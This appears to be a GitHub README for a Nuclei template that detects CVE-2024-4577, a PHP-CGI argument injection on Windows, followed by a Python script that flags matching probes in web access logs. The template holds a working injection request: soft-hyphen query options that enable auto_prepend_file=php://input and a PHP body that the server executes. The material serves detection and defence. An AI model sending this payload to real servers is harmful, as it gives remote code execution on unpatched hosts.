CVE-2024-4577 PoC — Argument Injection in PHP-CGI

Associated Vulnerability
Title: Argument Injection in PHP-CGI (CVE-2024-4577)
Description: In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.
Readme
# CVE-2024-4577 Nuclei Template

This repository contains a Nuclei template to detect the PHP CGI Argument Injection vulnerability identified as CVE-2024-4577.

## Template Details

```yaml
id: CVE-2024-4577

info:
  name: CVE-2024-4577 PHP CGI Argument Injection
  author: Hüseyin TINTAŞ
  severity: critical
  description: >
    CVE-2024-4577 PHP CGI Argument Injection Vulnerability.
    This template checks if the response contains the MD5 hash of "CVE_2024_4577_TEST", indicating a successful injection.
  tags: cve,cve2024,php,cgi,rce,cve2024-4577

http:
  - method: POST
    path:
      - "{{BaseURL}}/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/cgi-bin/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/php-cgi/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/index.test?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      
    headers:
      User-Agent: "curl/8.3.0"
      Accept: "*/*"
      Content-Type: "application/x-www-form-urlencoded"
      Connection: "keep-alive"
    body: |
      <?php echo md5("CVE_2024_4577_TEST"); ?>
    matchers:
      - type: word
        part: body
        words:
          - "83946a388fdf6cd2707eed8550575a76"

```
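For defenders, the request paths in the template leave a recognizable trace in web server access logs: a query string whose arguments start with the `%AD` byte followed by an option letter. The following Python script is an added example, not part of the original repository; it assumes combined-format access logs, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')
# %AD (soft hyphen) at the start of the query or after an argument separator,
# followed by a letter: the shape of the "%ADd" prefix in the template's paths.
SOFT_HYPHEN_OPT_RE = re.compile(r'(?:^|\+|%20)%ad[a-z]', re.IGNORECASE)
# php.ini directives that the template's paths set through the injected option.
DIRECTIVES = ("allow_url_include", "auto_prepend_file")


def classify(uri):
    """Return the reasons a request URI resembles the template's probe."""
    query = urlsplit(uri).query
    reasons = []
    if SOFT_HYPHEN_OPT_RE.search(query):
        reasons.append("soft-hyphen option prefix")
    lowered = query.lower()
    for name in DIRECTIVES:
        if name in lowered:
            reasons.append("directive " + name)
    return reasons


def find_probes(log_lines):
    """Return (client_ip, uri, reasons) for each log line matching the probe."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reasons = classify(m.group("uri"))
        # Require the soft-hyphen prefix; a directive name alone is only context.
        if "soft-hyphen option prefix" in reasons:
            hits.append((line.split(" ", 1)[0], m.group("uri"), reasons))
    return hits


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jun/2024:10:00:01 +0000] "POST /index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 32 "-" "curl/8.3.0"',
    '203.0.113.5 - - [10/Jun/2024:10:00:02 +0000] "GET /index.php?page=2&sort=asc HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Jun/2024:10:00:03 +0000] "GET /search.php?q=allow_url_include HTTP/1.1" 200 810 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, uri, reasons in find_probes(SAMPLE_LOG):
        print(ip, uri, "; ".join(reasons))
```

A hit only shows that a probe was sent; whether the host was affected depends on the PHP version and setup listed in the vulnerability description.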

## Usage

To use this template with Nuclei, save the template content into a file named `CVE-2024-4577.yaml` and run the following command:

```bash
nuclei -t CVE-2024-4577.yaml -u <target-url>
```

Replace `<target-url>` with the URL of the target you want to scan.

## Contact

For any inquiries or further information, you can reach out to me through:

- [LinkedIn](https://www.linkedin.com/in/huseyintintas/)
- [Twitter](https://twitter.com/1337stif)